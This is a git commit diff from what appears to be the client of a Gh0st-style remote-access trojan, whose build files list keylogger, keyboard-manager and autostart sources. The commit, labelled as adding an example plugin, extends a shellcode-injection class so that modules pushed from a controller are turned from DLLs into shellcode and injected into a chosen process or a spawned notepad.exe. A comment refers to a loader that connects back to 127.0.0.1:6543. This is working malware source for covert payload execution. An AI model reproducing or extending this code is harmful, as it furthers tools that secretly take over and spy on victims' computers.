plugin: Add an example plugin project for reference

2025-11-13 06:04:26 +08:00
parent 086afb36b4
commit 416d66bc87
13 changed files with 10519 additions and 10170 deletions
--- a/client/ClientDll_vs2015.vcxproj
+++ b/client/ClientDll_vs2015.vcxproj
@@ -177,6 +177,7 @@
    <ClCompile Include="KernelManager.cpp" />
    <ClCompile Include="KeyboardManager.cpp" />
    <ClCompile Include="keylogger.cpp" />
+    <ClCompile Include="Loader.cpp" />
    <ClCompile Include="LoginServer.cpp" />
    <ClCompile Include="Manager.cpp" />
    <ClCompile Include="MemoryModule.c" />
--- a/client/KernelManager.cpp
+++ b/client/KernelManager.cpp
@@ -16,6 +16,7 @@
 #include "IOCPUDPClient.h"
 #include "IOCPKCPClient.h"
 #include "auto_start.h"
+#include "ShellcodeInj.h"

 // UDP 协议仅能针对小包数据，且数据没有时序关联
 IOCPClient* NewNetClient(CONNECT_ADDRESS* conn, State& bExit, const std::string& publicIP, bool exit_while_disconnect)
@@ -195,7 +196,13 @@ DWORD WINAPI ExecuteDLLProc(LPVOID param)
            PTHREAD_START_ROUTINE proc = (PTHREAD_START_ROUTINE)runner->GetProcAddress(module, "run");
            Mprintf("MemoryGetProcAddress '%s' %s\n", info.Name, proc ? "success" : "failed");
            if (proc) {
-                proc(&pThread);
+                if (info.RunType == MEMORYDLL)
+                    proc(&pThread);
+                else if (info.RunType == SHELLCODE){
+					ShellcodeInj inj(dll->buffer, info.Size, "run", &pThread, sizeof(PluginParam));
+                    if (info.Pid < 0) info.Pid = GetCurrentProcessId();
+                    bool ret = info.Pid ? inj.InjectProcess(info.Pid) : inj.InjectProcess("notepad.exe", true);
+                }
            } else {
                while (S_CLIENT_EXIT != *pThread.Exit)
                    Sleep(1000);
@@ -503,7 +510,7 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
            find = m_MemDLL.find(md5);
        }
        BYTE* data = find != m_MemDLL.end() ? find->second.data() : NULL;
-        if (info->Size == ulLength - sz && info->RunType == MEMORYDLL) {
+        if (info->Size == ulLength - sz) {
            if (md5[0]) {
                m_MemDLL[md5] = std::vector<BYTE>(szBuffer + sz, szBuffer + sz + info->Size);
                iniFile cfg(CLIENT_PATH);
--- a/client/SCLoader.cpp
+++ b/client/SCLoader.cpp
--- a/client/ShellcodeInj.h
+++ b/client/ShellcodeInj.h
@@ -4,9 +4,8 @@
 #include <string>
 #include <iostream>
 #include <tlhelp32.h>
-// A shell code loader connect to 127.0.0.1:6543.
-// Build: xxd -i TinyRun.dll > SCLoader.cpp
-#include "SCLoader.cpp"
+
+DWORD HashFunctionName(LPSTR name);

 BOOL ConvertToShellcode(LPVOID inBytes, DWORD length, DWORD userFunction, LPVOID userData, DWORD userLength,
                        DWORD flags, LPSTR& outBytes, DWORD& outLength);
@@ -15,18 +14,28 @@ BOOL ConvertToShellcode(LPVOID inBytes, DWORD length, DWORD userFunction, LPVOID
 class ShellcodeInj
 {
 public:
+    ShellcodeInj(BYTE* buf, int len, const char *func=0, LPVOID userData=0, DWORD userLength=0) {
+		m_buffer = buf;
+		m_length = len;
+        m_userFunction = func ? HashFunctionName((char*)func) : 0;
+        m_userData = userData;
+        m_userLength = userLength;
+    }
+
    // Return the process id if inject succeed.
    int InjectProcess(const char* processName = nullptr, bool hasPermission=false)
    {
+        if (m_buffer == NULL) return 0;
+
        if (processName) {
            auto pid = GetProcessIdByName(processName);
-            if (pid ? InjectShellcode(pid, (BYTE*)TinyRun_dll, TinyRun_dll_len) : false)
+            if (pid ? InjectShellcode(pid, (BYTE*)m_buffer, m_length, m_userFunction, m_userData, m_userLength) : false)
                return pid;
        }
        if (hasPermission) {
            auto pid = LaunchNotepadWithCurrentToken();
            if (pid) {
-                return InjectShellcode(pid, (BYTE*)TinyRun_dll, TinyRun_dll_len) ? pid : 0;
+                return InjectShellcode(pid, (BYTE*)m_buffer, m_length, m_userFunction, m_userData, m_userLength) ? pid : 0;
            }
        }

@@ -37,11 +46,21 @@ public:
        if (CreateProcess(NULL, "\"notepad.exe\"", NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
            CloseHandle(pi.hProcess);
            CloseHandle(pi.hThread);
-            return InjectShellcode(pi.dwProcessId, (BYTE*)TinyRun_dll, TinyRun_dll_len) ? pi.dwProcessId : 0;
+            return InjectShellcode(pi.dwProcessId, (BYTE*)m_buffer, m_length, m_userFunction, m_userData, m_userLength) ? pi.dwProcessId : 0;
        }
        return 0;
    }
+
+    bool InjectProcess(int pid) {
+        return m_buffer ? InjectShellcode(pid, (BYTE*)m_buffer, m_length, m_userFunction, m_userData, m_userLength) : false;
+    }
+
 private:
+    BYTE* m_buffer = NULL;
+    int m_length = 0;
+    DWORD m_userFunction = 0;
+    LPVOID m_userData = 0;
+    DWORD m_userLength = 0;
    DWORD LaunchNotepadWithCurrentToken()
    {
        HANDLE hToken = NULL;
@@ -161,12 +180,13 @@ private:
        return hProcess;
    }

-    bool MakeShellcode(LPBYTE& compressedBuffer, int& ulTotalSize, LPBYTE originBuffer, int ulOriginalLength)
+    bool MakeShellcode(LPBYTE& compressedBuffer, int& ulTotalSize, LPBYTE originBuffer, int ulOriginalLength, 
+        DWORD userFunction, LPVOID userData, DWORD userLength)
    {
        if (originBuffer[0] == 'M' && originBuffer[1] == 'Z') {
            LPSTR finalShellcode = NULL;
            DWORD finalSize;
-            if (!ConvertToShellcode(originBuffer, ulOriginalLength, NULL, NULL, 0, 0x1, finalShellcode, finalSize)) {
+            if (!ConvertToShellcode(originBuffer, ulOriginalLength, userFunction, userData, userLength, 0x1, finalShellcode, finalSize)) {
                return false;
            }
            compressedBuffer = new BYTE[finalSize];
@@ -181,7 +201,7 @@ private:
    }

    // Inject shell code to target process.
-    bool InjectShellcode(DWORD pid, const BYTE* pDllBuffer, int dllSize)
+    bool InjectShellcode(DWORD pid, const BYTE* pDllBuffer, int dllSize, DWORD userFunction, LPVOID userData, DWORD userLength)
    {
        HANDLE hProcess = CheckProcess(pid);
        if (!hProcess)
@@ -190,7 +210,7 @@ private:
        // Convert DLL -> Shell code.
        LPBYTE shellcode = NULL;
        int len = 0;
-        if (!MakeShellcode(shellcode, len, (LPBYTE)pDllBuffer, dllSize)) {
+        if (!MakeShellcode(shellcode, len, (LPBYTE)pDllBuffer, dllSize, userFunction, userData, userLength)) {
            Mprintf("MakeShellcode failed \n");
            CloseHandle(hProcess);
            return false;
--- a/client/ghost_vs2015.vcxproj
+++ b/client/ghost_vs2015.vcxproj
@@ -187,6 +187,7 @@
    <ClCompile Include="KernelManager.cpp" />
    <ClCompile Include="KeyboardManager.cpp" />
    <ClCompile Include="keylogger.cpp" />
+    <ClCompile Include="Loader.cpp" />
    <ClCompile Include="LoginServer.cpp" />
    <ClCompile Include="Manager.cpp" />
    <ClCompile Include="MemoryModule.c" />
--- a/client/test.cpp
+++ b/client/test.cpp
@@ -7,6 +7,9 @@
 #include "common/dllRunner.h"
 #include <common/iniFile.h>
 #include "auto_start.h"
+// A shell code loader connect to 127.0.0.1:6543.
+// Build: xxd -i TinyRun.dll > SCLoader.cpp
+#include "SCLoader.cpp"
 extern "C" {
 #include "reg_startup.h"
 }
@@ -235,7 +238,7 @@ int main(int argc, const char *argv[])
    if (g_ConnectAddress.iStartup == Startup_InjSC) {
        // Try to inject shell code to `notepad.exe`
        // If failed then run memory DLL
-        ShellcodeInj inj;
+        ShellcodeInj inj(TinyRun_dll, TinyRun_dll_len);
        int pid = 0;
        hEvent = ::CreateEventA(NULL, TRUE, FALSE, NULL);
        do {